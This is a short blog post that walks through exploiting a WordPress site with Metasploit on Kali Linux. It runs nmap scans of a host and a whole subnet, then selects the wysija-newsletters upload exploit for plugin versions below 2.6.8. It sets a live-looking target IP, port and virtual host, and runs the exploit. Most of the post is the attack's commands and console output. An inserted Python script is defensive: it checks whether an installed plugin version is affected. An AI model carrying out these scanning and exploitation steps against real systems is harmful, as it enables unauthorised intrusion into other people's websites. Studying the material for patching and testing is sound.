Myles Braithwaite

This is a quick blog post about exploiting a WordPress website using Metasploit on Kali Linux.

Identify a Remote Host

msf > db_nmap -v -sV 192.168.111.xxx

Scan an Entire Network

This will save the results to the Metasploit database:

msf > db_nmap -v -sV 192.168.111.0/24 -oA subnet_1

  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

This will select an exploit to use:

msf > use exploit/unix/webapp/wp_wysija_newsletters_upload

This will list the payloads that can be used with the exploit:

msf exploit(wp_wysija_newsletters_upload) > show payloads

This will show what software and version will be targeted:

msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8
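
The version bound in that target list is what a site owner can check on their own install. The script below is an added example, not part of the original post: it reads the WordPress plugin header on disk and reports whether the installed version is below 2.6.8. It assumes the plugin directory is named wysija-newsletters like the target and that the WordPress root is passed as the first argument.

```python
import re
import sys
from pathlib import Path

FIXED = (2, 6, 8)            # bound from the target list: wysija-newsletters < 2.6.8
SLUG = "wysija-newsletters"  # assumption: plugin directory is named like the target

# WordPress plugin header fields sit in a comment at the top of the main PHP file.
HEADER = re.compile(r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)\s*$", re.I | re.M)

def read_header(php_file):
    """Parse header fields from the first 8 KB of a file, the span WordPress reads."""
    text = Path(php_file).read_bytes()[:8192].decode("utf-8", "replace")
    return {key.lower(): value for key, value in HEADER.findall(text)}

def parse_version(text):
    """'2.6.7' -> (2, 6, 7); stops at the first component with no leading digits."""
    parts = []
    for piece in text.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)

def is_affected(version):
    """True if version < 2.6.8. An empty or unparsable version counts as affected."""
    parsed = parse_version(version)
    parsed += (0,) * (len(FIXED) - len(parsed))  # pad so '2.6' compares as 2.6.0
    return parsed < FIXED

def audit(wp_root):
    """Return (version, affected) for the installed plugin, or None if it is absent."""
    plugin_dir = Path(wp_root) / "wp-content" / "plugins" / SLUG
    for php in sorted(plugin_dir.glob("*.php")):
        header = read_header(php)
        if "plugin name" in header:  # only the main plugin file carries this field
            version = header.get("version", "")
            return version, is_affected(version)
    return None

if __name__ == "__main__":
    result = audit(sys.argv[1] if len(sys.argv) > 1 else ".")
    if result is None:
        print(f"{SLUG}: not installed")
    else:
        print(f"{SLUG} {result[0] or '(no version)'}: "
              f"{'AFFECTED, update to 2.6.8 or later' if result[1] else 'ok'}")
```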

Next, configure the exploit:

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletters_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                           no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Here is where we set all the options:

msf exploit(wp_wysija_newsletters_upload) > set RHOST 159.203.19.77
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit